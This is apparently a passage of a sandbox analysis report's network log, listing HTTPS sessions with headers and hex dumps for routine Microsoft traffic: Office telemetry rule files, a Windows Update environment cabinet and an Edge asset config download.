                                                                                                                                                                                                        2024-12-04 12:53:27 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                                                                                                                                                                                        Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        41192.168.2.74975913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:27 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                        x-ms-request-id: 8c022bf0-601e-0070-5bcb-45a0c9000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125327Z-1746fd949bdjzh7thC1EWR3g64000000018g0000000076c3
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:27 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        42192.168.2.749751172.202.163.200443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HWvNagD4okpHDot&MD=86O4NVBB HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                        2024-12-04 12:53:28 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                        MS-CorrelationId: 9cb6c02b-8b72-4aa2-b970-2327b0e442b0
                                                                                                                                                                                                        MS-RequestId: 64afdcdf-bd75-4d3e-94af-40928406f4d0
                                                                                                                                                                                                        MS-CV: NZjfeeH8BEe6MMCt.0
                                                                                                                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:27 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 24490
                                                                                                                                                                                                        2024-12-04 12:53:28 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                        2024-12-04 12:53:28 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        43192.168.2.74976213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:28 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:29 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 420
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                        x-ms-request-id: de9014ac-301e-0051-7cc5-4538bb000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125329Z-1746fd949bd6ztf6hC1EWRvq2s00000000w00000000070w4
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:29 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        44192.168.2.74976313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:28 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:29 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                        x-ms-request-id: 4626c155-d01e-0017-0ecc-45b035000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125329Z-1746fd949bdnq7x2hC1EWRpxr000000000y000000000c0xz
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        45192.168.2.74976413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:28 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:29 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                        x-ms-request-id: ddae3c3f-c01e-008d-3acb-452eec000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125329Z-1746fd949bdzd2qvhC1EWRcygw00000000w0000000009r1e
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:29 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        46192.168.2.74976513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:28 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:29 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                        x-ms-request-id: 85a33a74-901e-005b-1ccd-452005000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125329Z-1746fd949bdl6zq5hC1EWRf3ws00000000w0000000008ek2
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:29 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        47192.168.2.74976813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:29 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:30 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 423
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                        x-ms-request-id: 8da67b63-c01e-0034-2ecb-452af6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125330Z-1746fd949bdnq7x2hC1EWRpxr0000000014g000000002t0v
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:30 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        48192.168.2.74976913.107.246.404437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:30 UTC711OUTGET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1
                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Edge-Asset-Group: EntityExtractionDomainsConfig
                                                                                                                                                                                                        Sec-Mesh-Client-Edge-Version: 117.0.2045.47
                                                                                                                                                                                                        Sec-Mesh-Client-Edge-Channel: stable
                                                                                                                                                                                                        Sec-Mesh-Client-OS: Windows
                                                                                                                                                                                                        Sec-Mesh-Client-OS-Version: 10.0.19045
                                                                                                                                                                                                        Sec-Mesh-Client-Arch: x86_64
                                                                                                                                                                                                        Sec-Mesh-Client-WebView: 0
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:30 UTC576INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:30 GMT
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Content-Length: 70207
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                        Last-Modified: Fri, 22 Nov 2024 21:01:12 GMT
                                                                                                                                                                                                        ETag: 0x8DD0B38CBCCFA90
                                                                                                                                                                                                        x-ms-request-id: 1a4f89b3-d01e-0008-14dc-457374000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-azure-ref: 20241204T125330Z-1746fd949bdkw94lhC1EWRxuz4000000019g00000000agmd
                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:30 UTC15808INData Raw: 1f 8b 08 08 18 f1 40 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7
                                                                                                                                                                                                        Data Ascii: @gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
